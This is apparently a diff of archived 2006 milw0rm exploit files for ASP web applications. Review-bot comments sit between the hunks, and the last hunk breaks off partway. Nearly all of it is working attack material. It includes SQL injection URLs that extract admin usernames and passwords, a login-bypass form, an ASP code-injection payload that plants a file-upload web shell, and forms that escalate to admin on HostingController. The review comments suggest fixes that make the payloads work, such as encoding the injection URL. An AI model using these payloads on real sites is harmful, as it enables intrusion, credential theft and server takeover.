<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]
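Review bot: the `<!--` at the start of the UserName value sits inside a quoted attribute, so it is not an HTML comment; it is submitted literally as the first four characters of the username, and the string the server sees is `<!--'union select 1 from Newsletter_Admin where ''='`. If the prefix is intentional (for example to hide the payload when it is echoed back) the page should say so; otherwise drop it so the payload reads as plain `'union select 1 from Newsletter_Admin where ''='`. Typo: "orginal advisory" should be "original advisory".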

View file

@ -12,5 +12,5 @@
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11]
# milw0rm.com [2006-06-11]
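Review bot: the example URL mixes encoded and raw spaces: `+from+uye+ORDER BY email ASC` has literal spaces after the `+`-encoded part, so the request is cut at `ORDER` when pasted into most clients. Encode it as `+from+uye+ORDER+BY+email+ASC`. The `Üye adi` / `Þifre` strings inside the concat() are cp1254 text rendered as cp1252 (`Þ` is `Ş`), cosmetic but worth normalising in the same pass. The rendered view also shows the trailing `# milw0rm.com [2006-06-11]` line twice, which suggests the only change in this hunk is whitespace or line endings.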

View file

@ -1,9 +1,9 @@
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]

View file

@ -1,51 +1,51 @@
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ...
Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19]
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ...
Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19]
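Review bot: the new copy of the ASP code-injection payload line (the long line beginning `#F9F9F9"`) no longer matches the old copy: `<%=content%></TEXTAREA>` has become `<%=content%>&lt;/textarea&gt;`, which looks like accidental HTML-entity encoding introduced while re-saving the file rather than an intended edit, and it silently alters an archived advisory that should be carried over byte-for-byte. Restore the original `</TEXTAREA>` so that the file differs from the old version only in the intended encoding or line-ending change, and confirm with a whitespace-ignoring diff that no other text in the hunk moved.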


@ -1,181 +1,181 @@
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------
<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
-------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06]
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------
<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
-------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06]


@ -1,12 +1,12 @@
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org
#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07]
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org
#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07]


@ -1,22 +1,22 @@
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: admin@asianeagle.org #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw0rm.com [2006-08-14]
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: admin@asianeagle.org #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw0rm.com [2006-08-14]


@ -1,27 +1,27 @@
################################################################################
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]
################################################################################
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]


@ -1,27 +1,27 @@
################################################################################
## ##
## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]
################################################################################
## ##
## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]


@ -1,16 +1,16 @@
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site : www.asianeagle.org
#Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03]
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site : www.asianeagle.org
#Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03]


@ -1,74 +1,74 @@
_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+
__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.
# milw0rm.com [2006-09-04]
_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+
__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.
# milw0rm.com [2006-09-04]


@ -1,23 +1,23 @@
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
